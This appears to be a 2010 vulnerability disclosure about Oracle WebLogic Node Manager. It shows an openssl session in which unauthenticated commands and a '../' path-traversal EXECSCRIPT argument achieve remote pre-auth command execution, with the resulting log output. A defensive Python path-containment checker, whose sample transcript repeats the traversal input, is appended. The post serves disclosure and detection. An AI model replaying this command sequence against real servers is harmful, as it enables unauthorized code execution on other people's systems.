Oracle WebLogic Server Node Manager "beasvc.exe" Remote Command Execution
2010-02-06 14:56
http://intevydis.blogspot.com/2010/01/oracle-weblogic-1032-node-manager-fun.html
Time for the final bug in our Week of Web Server bugs. It has been in Vulndisco since Oct, 2008.

Oracle WebLogic has an optional Node Manager utility which is used to start/stop server instances from a remote location. It is important to know that Node Manager is the beasvc.exe process, which listens on port 5556. It supports several commands, and no authentication is required to enter some of them; you only need to know the name of a WebLogic domain (btw, in the default install WebLogic has at least 2 domains: wl_server and medrec).

As beasvc.exe speaks over SSL, we will use the openssl utility. The character '>' marks the beginning of our command (write the command after '>' and press Enter):

$ openssl s_client -host 192.168.56.101 -port 5556
>HELLO asdf
+OK Node manager v10.3 started

Remote version leak bug here ;-)

>DOMAIN xyz
-ERR I/O error while reading domain directory
>GETNMLOG
java.io.FileNotFoundException: Domain directory 'C:/Oracle/Middleware/wlserver_10.3/common/nodemanager' invalid (domain salt file not found)
    at weblogic.nodemanager.server.DomainManager.initialize(DomainManager.java:79)
    at weblogic.nodemanager.server.DomainManager.(DomainManager.java:54)
    at weblogic.nodemanager.server.NMServer.getDomainManager(NMServer.java:257)
    at weblogic.nodemanager.server.Handler.handleDomain(Handler.java:218)
    at weblogic.nodemanager.server.Handler.handleCommand(Handler.java:108)
    at weblogic.nodemanager.server.Handler.run(Handler.java:70)
    at java.lang.Thread.run(Thread.java:619)
>DOMAIN wl_server
+OK Current domain set to 'wl_server'
>EXECSCRIPT ../../../../../../../../Windows/System32/ping.exe
-ERR 1
>GETNMLOG
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> <Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < [-r count] [-s count] [[-j host-list] | [-k host-list]]>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < [-w timeout] [-R] [-S srcaddr] [-4] [-6] target_name>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> <Options:>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -t Ping the specified host until stopped.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < To see statistics and continue - type Control-Break;>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < To stop - type Control-C.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -a Resolve addresses to hostnames.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -n count Number of echo requests to send.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -l size Send buffer size.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -f Set Don't Fragment flag in packet (IPv4-only).>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -i TTL Time To Live.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -v TOS Type Of Service (IPv4-only).>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -r count Record route for count hops (IPv4-only).>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -s count Timestamp for count hops (IPv4-only).>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -j host-list Loose source route along host-list (IPv4-only).>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -k host-list Strict source route along host-list (IPv4-only).>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -w timeout Timeout in milliseconds to wait for each reply.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -R Use routing header to test reverse route also (IPv6-only). >
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -S srcaddr Source address to use.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -4 Force using IPv4.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> < -6 Force using IPv6.>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
<Jan 22, 2010 6:37:51 AM> <INFO> <>
.
+OK Node manager log file sent

Obviously it is a remote preauth command execution bug!
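
The containment check that would reject the EXECSCRIPT argument used in the session above, as an added example (not code from the original post or from Oracle). SCRIPT_BASE, the script name rotate.cmd and the sample transcript are assumptions constructed for illustration; Windows path rules are applied through Python's ntpath module so the result is the same on any OS.

```python
import ntpath

# Assumed layout (hypothetical): the only directory scripts may be run from.
# The page does not say which directory the service uses.
SCRIPT_BASE = r"C:\domains\wl_server\scripts"

def resolve_script(arg, base=SCRIPT_BASE):
    """Return the normalized script path if arg stays under base, else None.

    The check is lexical: it collapses '..' and mixed separators but does not
    follow junctions or symlinks, which need a filesystem-level check as well.
    """
    base_n = ntpath.normcase(ntpath.normpath(base))
    # join() discards base when arg is rooted or carries its own drive/UNC
    # prefix, so absolute arguments fall out of the base here as well.
    cand = ntpath.normcase(ntpath.normpath(ntpath.join(base, arg)))
    try:
        inside = ntpath.commonpath([base_n, cand]) == base_n
    except ValueError:  # paths on different drives or UNC shares
        inside = False
    return cand if inside and cand != base_n else None

def flag_session(lines):
    """Return (line_no, line) for EXECSCRIPT requests that escape the base."""
    hits = []
    for n, line in enumerate(lines, 1):
        verb, _, arg = line.lstrip(">").strip().partition(" ")
        if verb.upper() == "EXECSCRIPT" and resolve_script(arg.strip()) is None:
            hits.append((n, line))
    return hits

# Constructed transcript: client-side lines in the format shown on this page.
SAMPLE = [
    ">HELLO asdf",
    ">DOMAIN wl_server",
    ">EXECSCRIPT ../../../../../../../../Windows/System32/ping.exe",
    ">EXECSCRIPT rotate.cmd",
]

if __name__ == "__main__":
    for n, line in flag_session(SAMPLE):
        print(f"line {n}: script path escapes {SCRIPT_BASE}: {line}")
```
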